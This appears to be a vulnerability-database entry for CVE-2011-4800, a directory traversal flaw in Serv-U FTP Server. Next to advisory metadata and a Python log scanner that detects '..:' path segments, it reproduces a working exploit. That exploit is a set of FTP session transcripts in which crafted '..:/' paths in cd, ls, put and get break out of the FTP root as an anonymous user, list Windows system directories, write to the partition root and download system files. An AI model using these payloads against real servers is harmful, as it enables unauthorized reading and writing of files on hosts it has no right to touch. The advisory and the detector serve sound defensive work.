Serv-U FTP Server Directory Traversal Vulnerability

Vulnerability ID 1120680 Vulnerability type Path traversal
Published 2011-12-01 Updated 2020-07-29
CVE ID CVE-2011-4800

CNNVD-ID CNNVD-201112-212
Platform Windows CVSS score 9.0
|Vulnerability source
https://www.exploit-db.com/exploits/18182
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201112-212
|Vulnerability details
A directory traversal vulnerability exists in Serv-U FTP Server versions before 11.1.0.5. Remote authenticated users can use "..:/" (dot dot colon slash) in the (1) list, (2) put, or (3) get commands to read and write arbitrary files, and to list and create arbitrary directories.
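A log check for the "..:" path segments described above, as an added example that is not part of the advisory or of Serv-U. The log line layout, the sample lines and the extra verbs NLST, CWD and MKD are assumptions made for illustration.

```python
import re

# FTP verbs that carry a path argument (RFC 959). The advisory names list,
# put and get; NLST, CWD and MKD are added here as an assumption.
PATH_VERBS = {"LIST", "NLST", "RETR", "STOR", "CWD", "MKD"}

# A path segment that is exactly ".." followed by one or more colons.
DOTDOT_COLON = re.compile(r"\.\.:+")

# Constructed sample log, assumed layout: <time> <client> <user> <VERB> <arg>
SAMPLE_LOG = r"""
2011-12-01T10:00:01 192.0.2.10 ftp CWD /..:/..:/..:/..:/program files
2011-12-01T10:00:05 192.0.2.10 ftp RETR ..:/..:/..:/..:/windows/system32/calc.exe
2011-12-01T10:00:09 192.0.2.11 alice STOR reports/2011/q4.txt
2011-12-01T10:00:12 192.0.2.11 alice CWD ..
2011-12-01T10:00:15 192.0.2.12 ftp NLST -a ..:\:..\..:\..:\*
2011-12-01T10:00:20 192.0.2.11 alice RETR notes/a..:b.txt
""".strip().splitlines()


def traversal_segments(arg):
    """Return every '..:' segment in an FTP path argument."""
    arg = arg.strip().strip('"')
    # LIST/NLST arguments may start with ls-style switches such as "-a".
    while arg.startswith("-") and " " in arg:
        arg = arg.split(" ", 1)[1].lstrip()
    # Split on both separators so "..:/" and "..:\" are treated alike.
    return [s for s in re.split(r"[\\/]+", arg) if DOTDOT_COLON.fullmatch(s)]


def scan(lines):
    """Return (client, user, verb, segment_count) for each suspicious command."""
    hits = []
    for line in lines:
        parts = line.split(None, 4)
        if len(parts) < 5 or parts[3].upper() not in PATH_VERBS:
            continue
        found = traversal_segments(parts[4])
        if found:
            hits.append((parts[1], parts[2], parts[3].upper(), len(found)))
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print("possible CVE-2011-4800 traversal:", hit)
```

A plain `CWD ..` and a file name that merely contains "..:" are not flagged; only whole path segments of the form "..:" are.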
|Exploit
I'm better than TESO!
CONFIDENTIAL SOURCE MATERIALS!
[*]----------------------------------------------------[*]
Serv-U FTP Server Jail Break 0day
Discovered By Kingcope
Year 2011
[*]----------------------------------------------------[*]
Affected:
220 Serv-U FTP Server v7.3 ready...
220 Serv-U FTP Server v7.1 ready...
220 Serv-U FTP Server v6.4 ready...
220 Serv-U FTP Server v8.2 ready...
220 Serv-U FTP Server v10.5 ready...
From the Vendor: Fixed in Serv-U 11.1.0.5+. Affects all previous versions.
[*]----------------------------------------------------[*]
C:\Users\kingcope\Desktop>ftp 192.168.133.134
Verbindung mit 192.168.133.134 wurde hergestellt.
220 Serv-U FTP Server v6.4 for WinSock ready...
Benutzer (192.168.133.134:(none)): ftp								(anonymous user :>)
331 User name okay, please send complete E-mail address as password.
Kennwort:
230 User logged in, proceed.
ftp> cd "/..:/..:/..:/..:/program files"
250 Directory changed to /LocalUser/LocalUser/LocalUser/LocalUser/program files
ftp> ls -la
200 PORT Command successful.
150 Opening ASCII mode data connection for /bin/ls.
dr--r--r--   1 user     group           0 Nov 12 21:48 .
dr--r--r--   1 user     group           0 Nov 12 21:48 ..
drw-rw-rw-   1 user     group           0 Feb 14  2011 Apache Software Foundatio
n
drw-rw-rw-   1 user     group           0 Feb  5  2011 ComPlus Applications
drw-rw-rw-   1 user     group           0 Jul 11 01:06 Common Files
drw-rw-rw-   1 user     group           0 Jul  8 16:57 CoreFTPServer
drw-rw-rw-   1 user     group           0 Jul 11 01:06 IIS Resources
d---------   1 user     group           0 Jul  8 16:12 InstallShield
Installation Information
drw-rw-rw-   1 user     group           0 Jul 29 15:07 Internet Explorer
drw-rw-rw-   1 user     group           0 Jul  8 16:12 Ipswitch
drw-rw-rw-   1 user     group           0 Feb 12  2011 Java
drw-rw-rw-   1 user     group           0 Jul 26 13:19 NetMeeting
drw-rw-rw-   1 user     group           0 Jul 29 14:39 Outlook Express
drw-rw-rw-   1 user     group           0 Jul  8 15:39 PostgreSQL
drw-rw-rw-   1 user     group           0 Nov 12 21:48 RhinoSoft.com
drw-rw-rw-   1 user     group           0 Feb 12  2011 Sun
d---------   1 user     group           0 Jul 29 15:13 Uninstall Information
drw-rw-rw-   1 user     group           0 Feb  5  2011 VMware
drw-rw-rw-   1 user     group           0 Jul  8 15:34 WinRAR
drw-rw-rw-   1 user     group           0 Jul 26 13:30 Windows Media Player
drw-rw-rw-   1 user     group           0 Feb  5  2011 Windows NT
d---------   1 user     group           0 Feb  5  2011 WindowsUpdate
226 Transfer complete.
FTP: 1795 Bytes empfangen in 0,00Sekunden 448,75KB/s
ftp>
[*]----------------------------------------------------[*]
with write perms:
ftp> put foo.txt ..:/..:/..:/foobar <<-- writes foo into root of partition
[*]----------------------------------------------------[*]
and as anonymous ftp:
ftp> get ..:/..:/..:/..:/windows/system32/calc.exe yes
200 PORT Command successful.
150 Opening ASCII mode data connection for calc.exe (115712 Bytes).
226 Transfer complete.
FTP: 115712 Bytes empfangen in 0,04Sekunden 2571,38KB/s
[*]----------------------------------------------------[*]
This works too!!! :
220 Serv-U FTP Server v7.3 ready...
Benutzer (xx.xx.xx.xx:(none)): ftp
331 User name okay, please send complete E-mail address as password.
Kennwort:
230 User logged in, proceed.
ftp> ls "-a ..:\:..\..:\..:\..:\..:\..:\..:\..:\*"
200 PORT Command successful.
150 Opening ASCII mode data connection for /bin/ls.
.
..
AUTOEXEC.BAT
boot.ini
bootfont.bin
bsmain_runtime.log
CONFIG.SYS
Documents and Settings
FPSE_search
Inetpub
IO.SYS
log
MSDOS.SYS
msizap.exe
MSOCache
mysql
NTDETECT.COM
ntldr
Program Files
RavBin
RECYCLER
Replay.log
rising.ini
System Volume Information
TDDOWNLOAD
WCH.CN
WINDOWS
wmpub
226 Transfer complete. 317 bytes transferred. 19.35 KB/sec.
FTP: 317 Bytes empfangen in 0,01Sekunden 21,13KB/s
[*]----------------------------------------------------[*]
Sometimes you need to give it the path:
ftp> ls "-a ..:\:..\..:\..:\..:\..:\..:\..:\..:\program files\*"
200 PORT Command successful.
150 Opening ASCII mode data connection for /bin/ls.
.
..
360
Adobe
ASP.NET
CCProxy
CE Remote Tools
cmak
Common Files
ComPlus Applications
D-Tools
FFTPServer
HTML Help Workshop
IISServer
InstallShield Installation Information
Intel
Internet Explorer
Java
JavaSoft
K-Lite Codec Pack
Microsoft ActiveSync
Microsoft Analysis Services
Microsoft Device Emulator
Microsoft MapPoint Web Service Samples
Microsoft MapPoint Web Service SDK, Version 4.0
Microsoft Office
Microsoft Office Servers
Microsoft Silverlight
Microsoft SQL Server
Microsoft Visual SourceSafe
Microsoft Visual Studio 8
Microsoft.NET
MSBuild
MSXML 6.0
NetMeeting
Outlook Express
PortMap1.61
Reference Assemblies
Rising
SQLXML 4.0
SQLyog Enterprise
STS2Setup_2052
Symantec
Thunder Network
TSingVision
Uninstall Information
Windows Media Player
Windows NT
WindowsUpdate
WinRAR
226 Transfer complete. 835 bytes transferred. 50.96 KB/sec.
FTP: 835 Bytes empfangen in 0,01Sekunden 64,23KB/s
ftp>
|References

Source: www.serv-u.com
Link: http://www.serv-u.com/releasenotes/
Source: EXPLOIT-DB
Name: 18182
Link: http://www.exploit-db.com/exploits/18182
Source: SECUNIA
Name: 47021
Link: http://secunia.com/advisories/47021
Source: FULLDISC
Name: 20111130Serv-URemote
Link: http://archives.neohapsis.com/archives/fulldisclosure/2011-11/0454.html